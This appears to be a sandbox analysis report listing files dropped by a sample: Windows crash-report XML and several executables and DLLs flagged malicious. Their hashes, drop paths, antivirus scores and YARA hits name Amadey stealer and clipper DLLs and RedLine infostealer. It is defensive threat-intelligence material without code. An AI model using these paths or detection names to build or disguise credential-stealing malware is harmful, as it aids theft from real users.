                                                                                                                                                                                                                                      SHA-256:DC65FA7A40339E8E3C51C9937E90FFDD93E09125E6A36A5E9952B7ECD9770EB1
                                                                                                                                                                                                                                      SHA-512:DA4B820008D3BFBAABFAB9F70D43758BCED1105DFEEED008711C86C6BFD05E8804A9A2EA8317920587239AF817358501154C4A03EFC5CB67EC24C11390F59902
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.3.6.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4690
                                                                                                                                                                                                                                      Entropy (8bit):4.511842143439859
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYNYm8M4JBLF2hm+q8cH5DmbDCkvsZd:uIjfkI7bT7V9Jzv5DmbDCdZd
                                                                                                                                                                                                                                      MD5:F89B4F017D0BFB1B6ECACB3E7C4D68F6
                                                                                                                                                                                                                                      SHA1:19AE9B439DBA46CDD860F4F453580B35115D8FA5
                                                                                                                                                                                                                                      SHA-256:87BA71E43ECA1F7629E70BCB9AD6E6E7CD6502BFA40EF5A0315117D4A5A51250
                                                                                                                                                                                                                                      SHA-512:7E796158B71FD385635175C2F9110B1766493BD8F2D0DAF5E06F46F5417080517826777E017B2D7A2EC1CE4C147649F61F7CB6B1319FFF95C1383A14F73FDEB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:36 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):266884
                                                                                                                                                                                                                                      Entropy (8bit):1.4889833278100257
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:T12XNVW5vvOq101AllmmaiCCHQ7jztajt5ZCU2iaNrYG5vv:xc8nOq106517wvYDJ2iQZv
                                                                                                                                                                                                                                      MD5:C3A1D4200E5269989E303E3F46089F3F
                                                                                                                                                                                                                                      SHA1:B3D40A540F614E123069741CB47DAFA7966D97C0
                                                                                                                                                                                                                                      SHA-256:4D4AF580794844CFE58F70ED7A90F65F64E3EE9B859653137E346C721093A4B9
                                                                                                                                                                                                                                      SHA-512:4547AEB383FCB7471E81A04FAF1B4DE59802BE7242A41939AC5618FFC665036F15D0D51C36EBCA2FAC98B5A42D41ACFEDCD75D6152A7105DEA2D9FE06C0385E6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8382
                                                                                                                                                                                                                                      Entropy (8bit):3.7059350021791615
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJVHs6LK26Y5ut6fgmfhBJjDprR389b83sfmI0m:R6lXJ26LK26Y5c6fgmfnJjfo88fV
                                                                                                                                                                                                                                      MD5:C1588EEB34F98D59CC26819C1A70C4A4
                                                                                                                                                                                                                                      SHA1:1C7EC11F3174883261F00A45B57D391E2B394B9A
                                                                                                                                                                                                                                      SHA-256:51EEEC463F6BC2AF7786799D508EEA30BD064E26EA6D5239DD4F481627E7030F
                                                                                                                                                                                                                                      SHA-512:66C0AF661049A85A7376CD3252F86E3CF992664C7D20BD11F91125F3F231CC8255802421839E0FF7DECD68D6C924A62FFFD2813271861665F8C42AD8097C5759
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.9.6.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4700
                                                                                                                                                                                                                                      Entropy (8bit):4.504627594026872
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYGYm8M4JOStGF3W+q83Zd5Dmb9zCkszrd:uIjfkI7bT7VGJ+WS5DmblCDrd
                                                                                                                                                                                                                                      MD5:879A419618F8560C1CB0958D70BCEE61
                                                                                                                                                                                                                                      SHA1:8053FB7850E96040FD7A6FE38766E38D2230AE90
                                                                                                                                                                                                                                      SHA-256:EA3EC92A484AA855CE3B7645F5A0E64162B043D8AE8523B6E4A314F0EB32688A
                                                                                                                                                                                                                                      SHA-512:043EBC6AD7738E2E993AEAA2105BEA512C943C16A95B9A511DB60F544964C451E6156C9C4E00EB17E8CAE582D5290297752A847D1BA29031A95D7EDC580AFC6B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
                                                                                                                                                                                                                                      MD5:154C3F1334DD435F562672F2664FEA6B
                                                                                                                                                                                                                                      SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
                                                                                                                                                                                                                                      SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
                                                                                                                                                                                                                                      SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 82%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1166336
                                                                                                                                                                                                                                      Entropy (8bit):7.035580812234568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8au92+b+HdiJUX:dTvC/MTQYxsWR7au92+b+HoJU
                                                                                                                                                                                                                                      MD5:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      SHA1:028913A79AEC041DCE33A9A9EEEFE9BAAF6624F2
                                                                                                                                                                                                                                      SHA-256:726B25FA91F7D312C60B8673B382880E6DA2FDB03EF452BB907E22F349016028
                                                                                                                                                                                                                                      SHA-512:0500E7D211A3103DAC3C7E2D59307BEE69B5D3A05CD6E74CAD008DAFDA4C0DFDCE183912BEF02C818CA2658480987607736EA0214B15ECC6589A1D0F121E0BC6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 33%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400158525810517
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                                                                                                                                                      MD5:726CD06231883A159EC1CE28DD538699
                                                                                                                                                                                                                                      SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                                                                                                                                                      SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                                                                                                                                                      SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
• Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460276790319054
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
                                                                                                                                                                                                                                      MD5:F35B671FDA2603EC30ACE10946F11A90
                                                                                                                                                                                                                                      SHA1:059AD6B06559D4DB581B1879E709F32F80850872
                                                                                                                                                                                                                                      SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
                                                                                                                                                                                                                                      SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2310656
                                                                                                                                                                                                                                      Entropy (8bit):7.953884128685067
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ceF1xn14NcC/U8RpYSS9ZzqCRTY5zug2ytKotFZsUt:F1xn1LC8OpjIM2FotFZsU
                                                                                                                                                                                                                                      MD5:C0480BD7CAD935735BED9E6E1159FE5A
                                                                                                                                                                                                                                      SHA1:3230E239BCBC4103B098EC175E1EDDBDFAE365F4
                                                                                                                                                                                                                                      SHA-256:8A6CFFB8A0BEC844AAB5739B103CB0AEEEEACC97ADBD24DC0021CEBE91EAAEEA
                                                                                                                                                                                                                                      SHA-512:F56E06A0A34889BD2B60C15FDA7BE1C740621B00662A0BFCE81235FC3B9119A0BB0F0F8D0F31A453A6168A5C95ADED23DE5E4B32C3B085107B1B10102DC94C52
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 41%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460494158653329
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                                                                                                                                                      MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                                                                                                                                                      SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                                                                                                                                                      SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                                                                                                                                                      SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 78%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1504
                                                                                                                                                                                                                                      Entropy (8bit):5.276227223006264
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3rSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNEr8H0UMem:bSU4y4RQmFoUeCamfm9qr9tK8NfUNEIa
                                                                                                                                                                                                                                      MD5:80431C8E41DDD0BB4C10AFAFA6A8D386
                                                                                                                                                                                                                                      SHA1:03B1AE4E67F7E151E2EED58A506BEA4AE777743F
                                                                                                                                                                                                                                      SHA-256:A22FA42F0CDD8F2155573B4B1F261A596A83A662AC90BBB1F2E716FA8E842B35
                                                                                                                                                                                                                                      SHA-512:9CD2731695221FD77371A8190663751C007DB060864B36DC096349DDCE320AFEFB0DD5F9D7EDB8908C449A745282DADF3E652B07960FEFBDCBD9B83F8847B97B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2962432
                                                                                                                                                                                                                                      Entropy (8bit):6.559828656405516
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:hz28Myn3uFDrmGjA1n1Nrd/O9LunYp6VyiW9k2MYD:p28pn3yD6F7rd/OrYyiT2M
                                                                                                                                                                                                                                      MD5:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      SHA1:62454E89CF9B2558347E2179F49FB4A56F4762EC
                                                                                                                                                                                                                                      SHA-256:8C8AFD00E6087780E4EE0A36F170BA06F13BA6D0C46CD2119B876E88D40C24E3
                                                                                                                                                                                                                                      SHA-512:C0454ED9124CD768B0E6C8090F5943F7828263B94D00138B8A208FD59E52C28329EA4CC466EE7830471D5F765CA5C9BFC1B48BDC7A5352BEC0A3E2C882C7B519
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
